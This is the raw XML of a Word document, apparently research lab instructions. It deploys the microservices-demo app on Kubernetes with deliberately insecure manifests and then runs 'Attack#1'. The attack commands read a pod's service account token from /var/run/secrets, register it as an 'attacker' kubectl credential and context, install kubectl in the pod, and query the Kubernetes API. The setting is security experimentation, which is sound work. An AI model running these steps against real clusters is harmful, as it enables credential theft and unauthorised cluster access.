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3B9A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Deploy microservice-demo,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265569F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set up a Kubernetes cluster, preferably kubeadm. (1 control plane + 2 worker nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AC5A0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Download the repository: https://github.com/GoogleCloudPlatform/microservices-demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B60EC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Please download the attached "microservices-demo.zip" folder. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5134A6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Replace the Kubernetes manifests under the Release folder of the attached "microservices-demo.zip" of repository downloaded in step 2 to deploy the application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BFD025">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I have attached an old version of my PhD dissertation. Please use the commands in the Table 5.11 in page 62 of my PhD Dissertation to generate the attacks.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4DD72E47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apply kubernetes-manifest.yaml in release folder to apply some insecure configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF357B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271E59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Attack#1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33E2C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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kubectl exec -it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>checkoutservice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- /bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF7B62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t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /var/run/secrets/kubernetes.io/serviceaccount/token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA4B946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t>Copy the token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B64E59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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TOKEN=$(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504D577"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kubectl config set-credentials attacker --token=$TOKEN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB3AF11"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Kubectl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US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 xml:space="preserve">config set-context attacker-context --cluster=&lt;cluster-name&gt; --user=attacker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161E9841"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kubectl config use-context attacker-context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EB708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t>wget https://storage.googleapis.com/kubernetes-release/release/${VERSION}/bin/linux/amd64/kubectl -O kubectl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2722E"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chmod +x ./kubectl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9AC034"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mv ./kubectl /usr/local/bin/kubectl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073C8988"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 w14:paraId="1DF2B33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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then send request to k8s api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173CCBF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4445BC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9B4445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00000000"/>
    <w:rsid w:val="37F862FF"/>
    <w:rsid w:val="7658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2024-06-22T22:43:00Z</dcterms:created>
  <dc:creator>zyue1_nh8hzsr</dc:creator>
  <cp:lastModifiedBy>沐寒阳</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-11T16:55:21Z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49D6667A82AA47EF9AC3F77DE5B35729_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiZTQ4ODQwNThiYTg4YTBlNDhkZDRmNGNiNWM5NWE1YzAiLCJ1c2VySWQiOiIyMTUwNDY2MjEifQ==</vt:lpwstr>
  </property>
</Properties>
</file>